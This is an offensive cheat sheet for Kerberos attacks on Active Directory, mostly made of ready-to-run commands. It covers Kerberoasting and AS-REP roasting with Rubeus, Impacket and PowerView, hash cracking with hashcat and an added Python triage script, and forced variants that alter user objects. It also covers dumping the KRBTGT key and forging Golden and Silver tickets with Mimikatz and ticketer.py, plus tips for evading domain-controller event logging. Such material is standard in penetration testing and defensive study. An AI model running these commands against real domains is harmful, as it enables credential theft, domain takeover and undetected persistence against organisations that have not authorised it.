Kerberos Attacks
Kerberos is the default authentication protocol in Active Directory. Several design features can be abused to compromise credentials or forge tickets for persistence.
(Figure: Kerberos attack flow)
Kerberoasting
Kerberoasting targets service accounts by requesting a Ticket Granting Service (TGS) ticket for a Service Principal Name (SPN). Any authenticated domain user can request a service ticket for any SPN. The ticket is encrypted with the service account's long-term key (its NT hash when RC4 is used), so it can be cracked offline without touching the account or generating failed logons. Any account with an SPN set is roastable, but only user accounts are worth cracking: computer accounts have random 120-character passwords.
Finding Vulnerable Accounts
First, identify user accounts that have a Service Principal Name (SPN) associated with them.
PowerView:
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname
Impacket:
GetUserSPNs.py corp.local/user:password -dc-ip 10.10.10.1
Requesting TGS Tickets
Request the TGS ticket for the identified services. The output can be saved for offline cracking.
Rubeus:
.\Rubeus.exe kerberoast /outfile:hashes.txt
Impacket (saves in hashcat format):
GetUserSPNs.py corp.local/user:password -dc-ip 10.10.10.1 -request -outputfile hashes.txt
PowerView (use -ExpandProperty, otherwise Out-File writes a truncated table instead of the raw hash):
Invoke-Kerberoast -OutputFormat Hashcat | Select-Object -ExpandProperty Hash | Out-File hashes.txt
Cracking the Hash
Use Hashcat mode 13100 (Kerberos 5 TGS-REP, etype 23 / RC4-HMAC). If the service account has AES enabled (msDS-SupportedEncryptionTypes), the ticket comes back as etype 17 or 18 and needs mode 19600 or 19700 instead, which crack far more slowly; Rubeus /tgtdeleg requests RC4 tickets where the account still allows it.
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
Targeted Kerberoasting
If you have write access to a user object (GenericWrite/GenericAll, or WriteProperty on servicePrincipalName), you can set a fake SPN on that user to make them kerberoastable. The SPN must be unique in the forest (a duplicate SPN is rejected), and you should remove it afterwards with the same cmdlet's -Clear parameter.
Set SPN on target user, then kerberoast:
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn'}
GetUserSPNs.py corp.local/user:password -dc-ip 10.10.10.1 -request
AS-REP Roasting
AS-REP Roasting targets users that have "Do not require Kerberos preauthentication" enabled (DONT_REQ_PREAUTH in userAccountControl). Because the KDC does not demand an encrypted timestamp first, anyone who knows the username can request an AS-REP (Authentication Service Response) for these users; it contains a chunk encrypted with a key derived from the user's password (the NT hash when RC4 is used), which can be cracked offline.
Enumeration & Exploitation
Identify accounts with pre-authentication disabled and request the AS-REP.
PowerView:
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname
Impacket (can enumerate without creds if usernames are known):
GetNPUsers.py corp.local/ -usersfile users.txt -dc-ip 10.10.10.1 -format hashcat -outputfile asrep.txt
With credentials:
GetNPUsers.py corp.local/user:password -dc-ip 10.10.10.1 -request -format hashcat -outputfile asrep.txt
Rubeus:
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
Cracking AS-REP
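Before running hashcat on roasting output, it pays to sort the lines by the mode they need and drop the ones that will never crack. The following is an added example (not code from the original page or from Rubeus, PowerView or Impacket) that covers both the Kerberoast cracking step above (mode 13100, or 19600/19700 for AES tickets) and the AS-REP step here (mode 18200). It parses the hash formats those tools emit, skips machine accounts and krbtgt, and groups the rest by hashcat mode. The sample lines are constructed; the hex blobs are placeholders, not real ticket material, and the output file names and wordlist path are assumptions.

```python
"""Triage Kerberoast / AS-REP roast output before cracking (added example)."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# hashcat modes by hash family and Kerberos encryption type (etype)
TGS_MODES = {23: 13100, 17: 19600, 18: 19700}   # RC4-HMAC, AES128, AES256
ASREP_MODES = {23: 18200}                        # AS-REP roast, RC4 only

# Constructed sample lines in the formats Rubeus/Impacket write (placeholders, not real data).
SAMPLE_LINES = [
    # RC4 service ticket for a user SPN: crackable with mode 13100
    "$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$" + "aa" * 16 + "$" + "bb" * 64,
    # AES256 service ticket: mode 19700, much slower to crack
    "$krb5tgs$18$svc_http$CORP.LOCAL$*HTTP/web01.corp.local*$" + "cc" * 12 + "$" + "dd" * 64,
    # machine account (trailing '$'): random 120-char password, not worth cracking
    "$krb5tgs$23$*WS01$$CORP.LOCAL$HOST/ws01.corp.local*$" + "ee" * 16 + "$" + "ff" * 64,
    # AS-REP roast line: mode 18200
    "$krb5asrep$23$jdoe@CORP.LOCAL:" + "11" * 16 + "$" + "22" * 64,
]


@dataclass
class RoastHash:
    kind: str            # "tgs" or "asrep"
    etype: int
    user: str
    realm: str
    spn: Optional[str]
    line: str

    @property
    def mode(self) -> Optional[int]:
        table = TGS_MODES if self.kind == "tgs" else ASREP_MODES
        return table.get(self.etype)

    @property
    def skip_reason(self) -> Optional[str]:
        if self.user.endswith("$"):
            return "machine account (random 120-char password)"
        if self.user.lower() == "krbtgt":
            return "krbtgt (not crackable in practice)"
        if self.mode is None:
            return f"no hashcat mode for etype {self.etype}"
        return None


def parse_roast_line(line: str) -> Optional[RoastHash]:
    """Parse one $krb5tgs$ / $krb5asrep$ line; return None for anything else or malformed input."""
    line = line.strip()
    if not line.startswith("$krb5"):
        return None
    try:
        fields = line.split("$")               # ['', 'krb5tgs', '23', ...]
        family, etype = fields[1], int(fields[2])
        rest = "$".join(fields[3:])            # rejoin: account names may end in '$'
        if family == "krb5asrep":
            # $krb5asrep$23$user@REALM:checksum$edata
            user, _, realm = rest.split(":", 1)[0].rpartition("@")
            return RoastHash("asrep", etype, user, realm, None, line)
        if family == "krb5tgs":
            if rest.startswith("*"):
                # etype 23: $krb5tgs$23$*user$REALM$spn*$checksum$edata
                parts = rest[1:rest.index("*", 1)].split("$")
                spn, realm = parts[-1], parts[-2]
                user = "$".join(parts[:-2])    # restores the '$' of a machine account
            elif "*" in rest:
                # etype 17/18: $krb5tgs$17$user$REALM$*spn*$checksum$edata
                head, _, tail = rest.partition("*")
                spn = tail.split("*", 1)[0]
                user, _, realm = head.rstrip("$").rpartition("$")
            else:
                # hashcat wiki variant without the SPN field
                parts = rest.split("$")
                user, realm, spn = parts[0], parts[1], None
            return RoastHash("tgs", etype, user, realm, spn, line)
    except (ValueError, IndexError):
        return None
    return None


def split_by_mode(lines):
    """Group crackable lines by hashcat mode; return (groups, skipped) where skipped is [(user, reason)]."""
    groups, skipped = defaultdict(list), []
    for line in lines:
        h = parse_roast_line(line)
        if h is None:
            continue
        if h.skip_reason:
            skipped.append((h.user, h.skip_reason))
        else:
            groups[h.mode].append(h.line)
    return dict(groups), skipped


def hashcat_commands(groups, wordlist="/usr/share/wordlists/rockyou.txt"):
    """One hashcat invocation per mode; file names roast_<mode>.txt are an assumption."""
    return [f"hashcat -m {mode} roast_{mode}.txt {wordlist}" for mode in sorted(groups)]


if __name__ == "__main__":
    groups, skipped = split_by_mode(SAMPLE_LINES)
    for mode, lines in sorted(groups.items()):
        with open(f"roast_{mode}.txt", "w") as fh:
            fh.write("\n".join(lines) + "\n")
        print(f"mode {mode}: {len(lines)} hash(es)")
    for user, reason in skipped:
        print(f"skipped {user}: {reason}")
    print("\n".join(hashcat_commands(groups)))
```

Feed it the concatenated output of the roasting tools (hashes.txt and asrep.txt) instead of SAMPLE_LINES; AES lines landing in 19600/19700 are the ones to reconsider before spending GPU time on them.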
Crack the hash using Hashcat mode 18200 (Kerberos 5 AS-REP, etype 23 / RC4). The tools above request RC4 AS-REPs by default, so this is the mode you will normally need.
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
Forced AS-REP Roasting
If you have sufficient rights on a user (GenericAll/GenericWrite, or write access to userAccountControl), you can disable pre-authentication, roast the account, and then re-enable it. The -XOR flag flips the DONT_REQ_PREAUTH bit (4194304 = 0x400000), so the same command both disables and re-enables it.
Disable preauth, AS-REP roast, then run the same command again to re-enable:
Set-DomainObject -Identity targetuser -XOR @{useraccountcontrol=4194304}
Golden & Silver Tickets
Ticket forgery attacks allow attackers to create valid Kerberos tickets. Golden Tickets (TGT) grant domain-wide access, while Silver Tickets (TGS) grant access to specific services.
Golden Ticket (TGT)
Requires the KRBTGT account key and the Domain SID. This grants complete control over the domain for as long as the KRBTGT key stays the same (it must be rotated twice to invalidate forged tickets). The NT hash works for RC4 tickets; using the AES256 key instead is preferable because an RC4-encrypted TGT in an AES-only domain stands out in 4769 events.
Get KRBTGT hash (requires DA or DCSync rights):
secretsdump.py corp.local/admin:password@DC_IP -just-dc-user krbtgt
Get Domain SID:
Get-DomainSID
# or
lookupsid.py corp.local/user:password@DC_IP
Create Golden Ticket with Mimikatz (/ptt injects it into the current session):
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /krbtgt:HASH /ptt
Create with Impacket:
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain corp.local Administrator
export KRB5CCNAME=Administrator.ccache
# with -k the target must be the DC's hostname (it has to match the service SPN), not its IP
psexec.py -k -no-pass corp.local/Administrator@dc01.corp.local
Silver Ticket (TGS)
Requires the service account's key (for host services such as CIFS this is the computer account's NT hash), the Domain SID, and the target SPN. Grants access only to that service on that host, but the forged TGS is presented directly to the host, which accepts it without contacting the DC because the PAC is not validated by default, so no 4768/4769 event is written on the DC.
Create Silver Ticket for CIFS (file shares):
kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-xxx /target:fileserver.corp.local /service:cifs /rc4:SERVICE_HASH /ptt
Impacket:
ticketer.py -nthash SERVICE_HASH -domain-sid S-1-5-21-xxx -domain corp.local -spn cifs/fileserver.corp.local Administrator